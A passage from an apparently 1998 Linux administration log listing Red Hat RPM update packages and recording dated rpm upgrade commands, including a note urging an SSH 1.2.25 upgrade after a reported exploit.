Mar 11 02:44 perl-5.004-4.i386.rpm -rw-r--r-- 1 root root 897523 Jan 16 04:19 pine-3.96-7.i386.rpm -rw-r--r-- 1 root root 23130 Jan 9 03:07 portmap-4.0-8.i386.rpm -rw-r--r-- 1 root root 116018 Jan 17 00:53 ppp-2.3.3-2.i386.rpm -rw-r--r-- 1 root root 86183 Apr 18 03:59 procps-1.2.7-1.i386.rpm -rw-r--r-- 1 root root 11629 Apr 18 03:59 procps-X11-1.2.7-1.i386.rpm -rw-r--r-- 1 root root 34085 Jan 16 00:24 quota-1.55-7.i386.rpm -rw-r--r-- 1 root root 369372 May 28 00:55 rpm-2.5.1-1.i386.rpm -rw-r--r-- 1 root root 139657 Dec 31 22:12 shadow-utils-970616-11.i386.rpm -rw-r--r-- 1 root root 22797 Dec 19 00:18 smbfs-2.0.1-2.i386.rpm -rw-r--r-- 1 root root 195341 Mar 26 00:32 svgalib-1.2.11-4.i386.rpm -rw-r--r-- 1 root root 89839 Dec 6 04:49 tcp_wrappers-7.6-2.i386.rpm -rw-r--r-- 1 root root 315350 Mar 21 07:01 texinfo-3.12-1.i386.rpm -rw-r--r-- 1 root root 229179 Mar 10 06:36 textutils-1.22-5.i386.rpm -rw-r--r-- 1 root root 6611 Jan 16 00:05 tmpwatch-1.5-1.i386.rpm -rw-r--r-- 1 root root 97906 Nov 27 1997 transfig-3.2-3.i386.rpm -rw-r--r-- 1 root root 182682 Dec 31 02:59 trn-3.6-11.i386.rpm -rw-r--r-- 1 root root 12634 Dec 18 03:06 usernet-1.0.6-1.i386.rpm -rw-r--r-- 1 root root 343980 Dec 30 03:13 util-linux-2.7-15.i386.rpm -rw-r--r-- 1 root root 28632 Dec 13 00:22 vixie-cron-3.0.1-20.i386.rpm -rw-r--r-- 1 root root 102656 Dec 13 00:22 wu-ftpd-2.4.2b15-6.i386.rpm -rw-r--r-- 1 root root 4493 Feb 4 22:31 xserver-wrapper-1.1-1.i386.rpm -rw-r--r-- 1 root root 19439 Dec 20 23:25 ypbind-3.3-2.i386.rpm Applied the following patches on 5/30/98: rpm -Uvh --force --nodeps rpm-2.5.1-1.i386.rpm rpm -Uvh glibc-2.0.7-13.i386.rpm rpm -Uvh glibc-devel-2.0.7-13.i386.rpm Applied the following on 6/1/98 to fix the --nodep issue: rpm -Uvh patch-2.5.2.i386.rpm 6/13/98 - SSH 1.2.25 update. There is a new SSH exploit that requires that users upgrade to 1.2.25 ASAP!!!! See the SSH chapter, section 28, for URLs. ----